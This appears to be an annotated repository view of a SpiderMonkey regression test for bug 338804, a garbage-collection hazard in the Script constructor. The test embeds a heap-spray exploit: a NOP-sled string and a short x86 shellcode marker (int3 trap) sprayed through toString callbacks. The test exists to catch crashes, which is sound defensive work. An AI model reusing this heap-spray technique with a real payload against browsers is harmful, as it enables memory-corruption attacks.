js/src/tests/js1_5/extensions/regress-338804-01.js@129ffea94266 (annotated)
js/src/tests/js1_5/extensions/regress-338804-01.js
Sat, 03 Jan 2015 20:18:00 +0100
- author
- Michael Schloh von Bennewitz <michael@schloh.com>
- date
- Sat, 03 Jan 2015 20:18:00 +0100
- branch
- TOR_BUG_3246
- changeset 7
- 129ffea94266
- permissions
- -rw-r--r--
Conditionally enable double key logic according to:
private browsing mode or privacy.thirdparty.isolate preference and
implement in GetCookieStringCommon and FindCookie where it counts...
With some reservations of how to convince FindCookie users to test
condition and pass a nullptr when disabling double key logic.
| michael@0 | 1 | /* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ |
| michael@0 | 2 | /* This Source Code Form is subject to the terms of the Mozilla Public |
| michael@0 | 3 | * License, v. 2.0. If a copy of the MPL was not distributed with this |
| michael@0 | 4 | * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ |
| michael@0 | 5 | |
| michael@0 | 6 | //----------------------------------------------------------------------------- |
| michael@0 | 7 | var BUGNUMBER = 338804; |
| michael@0 | 8 | var summary = 'GC hazards in constructor functions'; |
| michael@0 | 9 | var actual = 'No Crash'; |
| michael@0 | 10 | var expect = 'No Crash'; |
| michael@0 | 11 | |
| michael@0 | 12 | printBugNumber(BUGNUMBER); |
| michael@0 | 13 | printStatus (summary); |
| michael@0 | 14 | printStatus ('Uses Intel Assembly'); |
| michael@0 | 15 | |
| michael@0 | 16 | // <script> |
| michael@0 | 17 | // SpiderMonkey Script() GC hazard exploit |
| michael@0 | 18 | // |
| michael@0 | 19 | // scale: magic number ;-) |
| michael@0 | 20 | // BonEcho/2.0a2: 3000 |
| michael@0 | 21 | // Firefox/1.5.0.4: 2000 |
| michael@0 | 22 | // |
| michael@0 | 23 | var rooter, scale = 3000; |
| michael@0 | 24 | |
| michael@0 | 25 | /* |
| michael@0 | 26 | if(typeof(setTimeout) != "undefined") { |
| michael@0 | 27 | setTimeout(exploit, 2000); |
| michael@0 | 28 | } else { |
| michael@0 | 29 | exploit(); |
| michael@0 | 30 | } |
| michael@0 | 31 | */ |
| michael@0 | 32 | |
| michael@0 | 33 | function exploit() { |
| michael@0 | 34 | if (typeof Script == 'undefined') |
| michael@0 | 35 | { |
| michael@0 | 36 | print('Test skipped. Script not defined.'); |
| michael@0 | 37 | } |
| michael@0 | 38 | else |
| michael@0 | 39 | { |
| michael@0 | 40 | Script({ toString: fillHeap }); |
| michael@0 | 41 | Script({ toString: fillHeap }); |
| michael@0 | 42 | } |
| michael@0 | 43 | } |
| michael@0 | 44 | |
| michael@0 | 45 | function createPayload() { |
| michael@0 | 46 | var result = "\u9090", i; |
| michael@0 | 47 | for(i = 0; i < 9; i++) { |
| michael@0 | 48 | result += result; |
| michael@0 | 49 | } |
| michael@0 | 50 | /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */ |
| michael@0 | 51 | result += "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2"; |
| michael@0 | 52 | return result; |
| michael@0 | 53 | } |
| michael@0 | 54 | |
| michael@0 | 55 | function fillHeap() { |
| michael@0 | 56 | rooter = []; |
| michael@0 | 57 | var payload = createPayload(), block = "", s2 = scale * 2, i; |
| michael@0 | 58 | for(i = 0; i < scale; i++) { |
| michael@0 | 59 | rooter[i] = block = block + payload; |
| michael@0 | 60 | } |
| michael@0 | 61 | for(; i < s2; i++) { |
| michael@0 | 62 | rooter[i] = payload + i; |
| michael@0 | 63 | } |
| michael@0 | 64 | return ""; |
| michael@0 | 65 | } |
| michael@0 | 66 | |
| michael@0 | 67 | // </script> |
| michael@0 | 68 | |
| michael@0 | 69 | reportCompare(expect, actual, summary); |
